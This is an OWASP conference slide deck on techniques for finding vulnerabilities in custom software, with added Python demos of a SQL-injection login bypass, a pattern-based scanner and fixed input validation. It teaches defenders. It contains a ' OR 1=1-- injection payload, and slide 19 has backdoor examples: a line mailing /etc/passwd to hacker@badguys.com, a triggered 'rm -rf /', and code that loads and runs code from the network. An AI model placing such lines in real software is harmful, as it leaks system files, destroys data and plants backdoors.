1. The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software
   Jeff Williams, CEO, Aspect Security; Chair, OWASP Foundation
   [email_address] 410-707-1487

2. The Future

   Software Facts
   Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1
   Modules 155
   Modules from Libraries 120

                                         % Vulnerability*
   Cross Site Scripting        22             65 %
   SQL Injection                2
   Buffer Overflow              5
   Total Security Mechanisms    3
   Encryption                   3
   Authentication              15             95 %
   Modularity                .035
   Cyclomatic Complexity      323
   Access Control               3
   Input Validation           233
   Logging                     33
   Expected Number of Users    15
   Typical Roles per Instance   4
   Reflected                   12
   Stored                      10

   * % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:

   Usage                            Intranet   Internet
   Cross Site Scripting   Less Than    10          5
   Reflected              Less Than    10          5
   Stored                 Less Than    10          5
   SQL Injection          Less Than    20          2
   Buffer Overflow        Less Than    20          2
   Security Mechanisms                 10         14
   Encryption                           3         15

3. Today
   - Code is code
     - All sectors
     - All languages
     - All platforms
     - All computing models
     - All sizes
     - Intra/Extra/Inter-net
   - New types of vulnerabilities are rare
   - The market doesn’t value secure code
   - We trust code we shouldn’t
   - Cheaper, faster only
   We don’t have any idea whether our code is trustworthy or not

4. Why Find Vulnerabilities?
   - Nobody believes their software is vulnerable
     - “If the software works, then it must be secure”
   - Finding flaws starts you on the path
   (cycle diagram: Find Flaws → Fix → Find Flaws → Improve → Find Flaws → Improve)
   If you’re not finding them, you’re allowing them

5. Software Is A Black Box
   - Complex
     - Millions of lines of code
     - Layers of leaky abstractions
     - Massively interconnected
   - Compiled
     - Difficult to reverse engineer
     - Different on every platform
   - Legal Protections
     - No peeking
     - We’re not liable

6. Key Vulnerabilities
   - A few serious common vulnerabilities…
     - Broken Access Control
     - Weak Authentication and Session Management
     - SQL Injection
     - Cross Site Scripting
   - For more information see…
     - The Top Ten Most Critical Web Application Vulnerabilities (www.owasp.org/documentation/topten.html)
     - A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)

7. SQL Injection Illustrated
   (diagram: an APPLICATION ATTACK passes through the Network Layer (Firewall, Hardened OS, Web Server, App Server, Firewall) into the Application Layer (Custom Code; Bus. Functions: Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce) and on to Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing; flow: HTTP request → SQL query → DB Table → HTTP response)
   "SELECT * FROM users WHERE user='' OR 1=1-- ' AND pass='password'"
   1. Application presents a login form to the attacker
   2. Attacker sends an attack in the form data
   3. Application forwards attack to the database in a SQL query
   4. Database runs query containing attack and sends results to application
   5. Application thinks login worked and sends welcome page
   Successful Login: “Welcome, Alice”
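The login bypass on slide 7, reproduced as an added example (not code from the talk) against an in-memory SQLite database, with the string-concatenated query beside its parameterized replacement. The table, the two users and the form value are constructed for this demo; the slides are about Java web applications, and Python is used here only because it runs the same SQL end to end with nothing to install.

```python
"""Added example: slide-7 style login, vulnerable and fixed, on SQLite."""
import sqlite3

# The form value from slide 7. The trailing "--" turns the rest of the
# concatenated query into a SQL comment, so "AND pass=..." never runs.
ATTACK_USER = "' OR 1=1--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users, Alice inserted first. Plaintext
    passwords are used only to keep the demo to one table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "Alice"), ("bob", "hunter2", "Bob")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str):
    """Builds SQL by string concatenation, as the slide's application does.
    Returns the display name of the first matching row, or None."""
    sql = ("SELECT name FROM users WHERE user='" + user
           + "' AND pass='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, user: str, password: str):
    """Parameterized query: user and password travel as bound values, so
    quotes or '--' inside them cannot change the statement's structure."""
    row = conn.execute(
        "SELECT name FROM users WHERE user=? AND pass=?", (user, password)
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both versions against the attack string and a real credential."""
    conn = make_db()
    return {
        "vulnerable_attack": login_vulnerable(conn, ATTACK_USER, "password"),
        "vulnerable_real": login_vulnerable(conn, "bob", "hunter2"),
        "safe_attack": login_safe(conn, ATTACK_USER, "password"),
        "safe_real": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

With the concatenated query the attack logs in as Alice (the first row the table scan returns, matching the slide's "Welcome, Alice"); with the parameterized query the same input simply fails to match any user while real credentials still work.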
8. Scanning for SQL Injection
   - Method
     - Use “signatures” to send malformed SQL commands
     - Analyze responses to see if it “worked”
     - Nessus, nikto, absinthe
   - Pros
     - Requires only network access to application
     - Fast and easy to run
   - Cons
     - May only exercise part of an application
     - Prone to false alarms and missed positives
     - Results indicate URL but not line of code
     - Can be problems with credentials, roles, and SSL

9. Static Analysis for SQL Injection
   - Method
     - Automatically analyze source code for patterns
     - Tools load source code, compile, and analyze
   - Pros
     - Requires only the software baseline
     - Fast and easy to run
   - Cons
     - Can’t factor in the runtime environment
     - Prone to false alarms and missed positives
     - Results indicate line of code but not URL
     - Doesn’t find design problems

10. Penetration Testing for SQL Injection
   - Method
     - Custom attacks by an expert security tester
     - Use OWASP WebScarab to craft custom attacks
     - Expert analyzes responses to see if attack worked
   - Pros
     - Open source tools available
     - Recommend an internal team
   - Cons
     - Requires expertise in security, software, and SQL
     - Difficult to exercise the entire application
     - Tester may not be able to determine success

11. Code Review for SQL Injection
   - Method
     - Reviewer analyzes code for patterns
     - Use tools to view baseline in different ways
     - Examine mechanisms, common vulnerability areas
   - Pros
     - Cost-effective
     - Can examine the entire baseline
   - Cons
     - Can’t factor in the runtime environment
     - Requires skills in software and security

12. Security Analysis Techniques

                  Find Vulnerabilities Using      Find Vulnerabilities Using
                  the Running Application         the Source Code
   Automated      Vulnerability Scanning          Static Code Analysis
   Manual         Penetration Testing             Code Review

   Combining All Four Techniques is Most Effective
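To make the pros and cons on slides 9 and 12 concrete, here is an added example (not a tool from the talk) of the simplest possible static pattern check for SQL built by concatenation, run over a constructed Java snippet. The snippet is written so that the four outcomes the slides warn about all appear: a real flaw, a false alarm on a compile-time constant, a correct negative on a PreparedStatement, and a miss where the query is assembled through a StringBuilder. Results come back as line numbers, never URLs, which is exactly the gap a scanner or penetration test fills from the other side.

```python
"""Added example: a text-pattern static check for concatenated SQL."""
import re

# Constructed Java source. The trailing comments say what a reviewer would
# conclude; the scanner itself cannot see any of that.
SAMPLE_JAVA = '''\
String q1 = "SELECT * FROM users WHERE user='" + user + "'";         // real flaw
String q2 = "SELECT * FROM users WHERE role='" + ADMIN_ROLE + "'";   // constant: false alarm
PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE user=?");
StringBuilder sb = new StringBuilder("SELECT * FROM audit WHERE id=");
sb.append(request.getParameter("id"));                                // missed: no '+' on this line
'''

# A string literal that opens with a SQL verb ...
SQL_KEYWORD = re.compile(r'"\s*(SELECT|INSERT|UPDATE|DELETE)\b', re.IGNORECASE)
# ... and, somewhere on the same line, a closing quote joined to an identifier by '+'.
CONCAT = re.compile(r'"\s*\+\s*(\w+)')


def scan(source: str) -> list:
    """Return [(line_no, identifier)] for each line holding a SQL literal that
    is concatenated with an identifier. Pure text matching, one line at a
    time: no data flow, so it cannot tell a constant from a request
    parameter, and it cannot follow a query split across lines."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if SQL_KEYWORD.search(line):
            match = CONCAT.search(line)
            if match:
                hits.append((line_no, match.group(1)))
    return hits


def report(source: str) -> list:
    """Human-readable findings, in the 'line of code, not URL' form of slide 9."""
    return [f"line {no}: SQL string concatenated with '{ident}'"
            for no, ident in scan(source)]


if __name__ == "__main__":
    for finding in report(SAMPLE_JAVA):
        print(finding)
```

On the sample this flags lines 1 and 2 and stays silent on 3, 4 and 5: one true positive, one false alarm, one correct negative and one missed flaw, which is why the deck ends with "combining all four techniques is most effective".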
13. Vulnerability Patterns

       public class DamagedStrutsForm extends ActionForm
       {
           public void doForm( HttpServletRequest request) {
               UserBean u = session.getUserBean();
               u.setName(request.getParameter("name"));
               u.setFavoriteColor(request.getParameter("color"));
           }
           public boolean validate( HttpServletRequest request) {
               try {
                   if ( request.getParameter("Name").indexOf("<scri") != -1 ) {
                       logger.log("Script detected" );
                       return false;
                   }
               }
               catch( Exception e ) {}
               return true;
           }
       }

   Callouts on the slide: Failure to Validate; Blacklist Validation; Fail Open; Failure to Validate; Time of Check, Time of Use; Failure to Validate
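An added example (not from the talk) that keeps the slide-13 logic as `validate_broken` and places the corrected pattern beside it. The slide's code is Java/Struts; this models the same read-validate-use flow in Python with a plain dict standing in for the request parameters, and the sample requests, the name pattern and the colour list are constructed. The corrected version closes each callout: it checks the same parameter the form uses (`name`, not `Name`), replaces the `<scri` blacklist with a whitelist, treats a missing parameter or exception as a rejection instead of falling open, validates `color` as well, and hands the validated values straight to the use step so nothing is re-read between check and use.

```python
"""Added example: slide-13 validation, broken form beside fail-closed form."""
import re

# Whitelist for a display name: letter first, then letters, apostrophe,
# space or hyphen, at most 50 characters total (constructed for the demo).
NAME_RE = re.compile(r"[A-Za-z][A-Za-z' -]{0,49}")
# Closed set of accepted colours (constructed for the demo).
COLORS = frozenset({"red", "green", "blue", "yellow"})


class ValidationError(ValueError):
    """Raised when a request must be rejected."""


def validate_broken(params: dict) -> bool:
    """Mirrors the slide: looks at 'Name' while the form uses 'name', only
    blacklists the literal '<scri', and the empty catch turns any error
    (missing parameter, wrong type) into 'valid'."""
    try:
        if "<scri" in params["Name"]:
            return False
    except Exception:
        pass
    return True


def validate(params: dict) -> dict:
    """Fail-closed whitelist validation. Returns the validated values so the
    caller uses exactly what was checked; any problem raises."""
    name = params.get("name")
    color = params.get("color")
    if not isinstance(name, str) or NAME_RE.fullmatch(name) is None:
        raise ValidationError("name")
    if color not in COLORS:
        raise ValidationError("color")
    return {"name": name, "color": color}


def is_valid(params: dict) -> bool:
    """Boolean view of validate() for callers that only need accept/reject."""
    try:
        validate(params)
    except ValidationError:
        return False
    return True


def do_form(params: dict) -> dict:
    """Use step: populates the user record only from validated values, so
    there is no second read of the request between check and use."""
    clean = validate(params)
    return {"name": clean["name"], "favorite_color": clean["color"]}


# Constructed sample requests.
GOOD = {"name": "Alice", "color": "red"}
SCRIPT_LOWER = {"name": "<script>alert(1)</script>", "color": "red"}
SCRIPT_UPPER_WRONG_KEY = {"Name": "<SCRIPT>alert(1)</SCRIPT>", "color": "red"}
MISSING_NAME = {"color": "red"}
BAD_COLOR = {"name": "Alice", "color": "<b>purple</b>"}

if __name__ == "__main__":
    for label, req in [("good", GOOD), ("script", SCRIPT_LOWER),
                       ("upper/wrong key", SCRIPT_UPPER_WRONG_KEY),
                       ("missing name", MISSING_NAME), ("bad color", BAD_COLOR)]:
        print(f"{label:16} broken={validate_broken(req)!s:5} fixed={is_valid(req)}")
```

Run as written, the broken validator accepts every constructed request except the one that happens to put the literal `<scri` under the key it checks, while the fixed validator accepts only the well-formed one.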
14. A Change In Perspective
   - Think like an attacker!
     - Understand how the application works
     - Especially the security mechanisms
     - How does the application make security decisions
   - The easy part?
     - Test and analyze for a single vulnerability
   - The hard part?
     - Do an entire application for all types of vulnerabilities

15. Getting Started
   - Adopt the OWASP Top Ten
     - Set the bar
   - Spot check a few applications
     - Are your security mechanisms easy to understand?
     - Are you doing validation, error handling, logging, etc?
   - Get security out in the open!
   - Come to my talk later to find out more!!!

16. OWASP Can Help
   - Open Web Application Security Project
     - Nonprofit Foundation
     - All materials available under approved open source licenses
     - Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month
   OWASP is dedicated to finding and fighting the causes of insecure software

17. OWASP Supports Vulnerability Analysis
   - OWASP Top Ten
     - Set priorities, get management buy-in
   - OWASP Guide
     - 300 page book for application security
   - OWASP Testing Guide
     - Test/analysis methods for application security
   - OWASP WebScarab
     - Web application & web service penetration tool

18. Some of What You’ll Find at OWASP
   - Community
     - Local Chapters
     - Translations
     - Conferences
     - Mailing Lists
     - Papers
     - and more…
   - All free and open source
   - We encourage your company to support us by becoming a member
   - Documentation
     - Guide
     - Top Ten
     - Testing
     - Legal
     - AppSec FAQ
     - and more…
   - Tools
     - WebGoat
     - WebScarab
     - Stinger
     - DotNet
     - and more…

19. What Could a Malicious Developer Do?
   - Trojan Horse runs for admin
         if ( System.getCurrentUser().getName().equals( "admin" ) )
             Runtime.exec( "sendmail hacker@badguys.com < /etc/passwd" );
   - Secret trigger removes all files on root partition
         if( req.getParameter( "codeword" ).equals( "eagle" ) )
             Runtime.exec( "rm –rf /" );
   - Randomly corrupt data one time in 100
         if ( Math.random() < .01 ) bean.setValue( "corrupt" );
   - Load and execute code from remote server
         ((A)(ClassLoader.getSystemClassLoader().defineClass(null,readBytesFromNetwork(),0,422).newInstance())).attack();
   - Make backdoor look like inadvertent mistake
         if ( input < 0 ) throw new RuntimeException( "Input error" );
     - Impossible to tell malicious from mistake
     - Who wrote the libraries your application uses?

20. Q&A: Questions and Answers
